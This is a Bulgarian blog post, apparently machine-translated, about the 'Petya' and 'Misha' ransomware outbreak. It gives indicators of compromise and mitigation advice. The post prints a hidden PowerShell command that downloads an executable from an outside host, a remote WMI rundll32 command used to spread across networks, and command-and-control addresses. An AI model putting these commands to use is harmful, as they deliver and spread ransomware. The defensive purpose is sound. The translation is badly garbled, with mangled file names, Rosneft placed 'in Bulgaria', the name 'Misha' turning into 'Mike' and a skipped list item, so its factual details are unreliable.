Злонамерен софтуер "Петър" и "Миша" се случва и какво да правя
Представен статия
В момента сигурността на информацията е много мощен самостоятелно направление на корпоративното автоматизация. Естествено, при такива обстоятелства, посоката е по-тясно свързан с проблемите на прилагането на информация ...
Към днешна дата, сигурността на корпоративните ресурси е една от приоритетните цели за всяка компания, независимо от размера и обхвата на дейностите. пазар информационната сигурност се разраства, което означава, че ...
Бизнес туризъм, чрез развитие на това качество на живот трябва да се увеличи, се вписва добре в концепцията за "интелигентна град". В допълнение, степента на използване на информационните технологии в индустрията през последните петнадесет до двадесет години ...
Причината за написването на този блог вече е станала на второ място в течение на годината масивна епидемия вирус. И това е един много неприятен прецедент. В крайна сметка, като инфекция мащабна не беше много дълго време. Въпреки това, се очаква тази ситуация. Епидемия, причинена ...
На интернет, нова епидемия - novosobrannye вируси програмисти "Петър» (Петя) и "Миша" (Миша), вече разпределени в десетки големи компании по целия свят.
Но криптиране модел се е променила значително. "Петър", прониква в компютъра с помощта на експлойта да зарази системата на MBR (магистър Boot Record). И тогава системата ботуши "Миша", който криптира файлове на диска и изисква откуп от $ 300 на компютър. Тъй като има промяна, когато "Петър" и "Майк" работят независимо един от друг, в зависимост от това дали правата на системния администратор. Има съобщения, че той също се срещнаха модела на разпространение с помощта на зловредни прикачени файлове да се маскират под PDF-файлове.
Този зловреден дует вече е изпратен в нокаут много сайтове, ОНД и спря работата на много компании. Според съобщения в медиите в България с най-големите проблеми, срещани в корпорацията "Роснефт", която в момента на разстояние от основните места и корпоративния сайт на "Bashneft". Въпреки това, недвусмислена информация за това какво е "Петър" и "Миша", все още. Криптограф не е проучена. Според «Д-р антивирусна компания Web », шифъра използва различен модел на разпространение. Въпреки това, визуално пиявица прозорец е идентичен с "Петя" и "Миша".
Маса заразяване записан във Франция, Испания, България и страните от ОНД. В Украйна, вирусът засегна десетки правителствени и търговски организации.
Следваща myguy файл. XLS предизвикано от% WINDIR% \ System32 \ mshta. Търсейки "« C: .. \ myguy XLS HTA »и причинява изпълнение PowerShell-skrita, зареждане на тялото на зловреден софтуер:
PowerShell. Търсейки -WindowStyle Hidden (.. Ню-Object система Net WebClient) .DownloadFile ( "h11p: // френски готвене COM / myguy Търсейки ..", "% APPDATA% \ 10807.exe ');" (PID: [номер метод] Допълнителна контекст: (.. система Net WebClient) .DownloadFile ( "h11p: // френски готвене COM / myguy Търсейки ..", "% APPDATA% \ [случаен номер] .exe ');)
След това, зловредният софтуер се опитва да се свърже с сървъри и 111.90.139.247:80 COFFEINOFFICE. XYZ: 80, че може би на сървъра за управление.
Индикатори за компромис е наличието на файлове:
След монтирането на приемащата сканиране на други Windows машини в мрежата и разпределението, дължащи се на уязвимостите, описани в MS17-010 (същите като използва WannaCry) на порт TCP: 135, TCP: 139, TCP: 445, TCP: 1024-1035.
Разпространението може да се появи в резултат на изпълнение на екипа:
Дистанционно WMI, "процес повикване създаде" C: \\ Windows \\ System32 \\ rundll32.exe "C:. \\ Windows \\ perfc DAT" №1 "
Как да се избегне инфекция? 1) откаже достъп до сървъри чрез HTTP: Френски готвене. COM: 80 84.200.16.242:80 111.90.139.247:80 COFFEINOFFICE. XYZ: 80
2) Забрана за прикачени към електронната поща и изтегляне на файлове с имената: Петър. APX, myguy. Търсейки, myguy. XLS, поръчка- [всяка дата] док
4) Настройте IPS да използват заключване за MS17-010
5) За да се защитят все още не е бил заразен домакини могат да създават файл C: \ Windows \ perfc без разширение. Инфекция на тези възли не се случи.
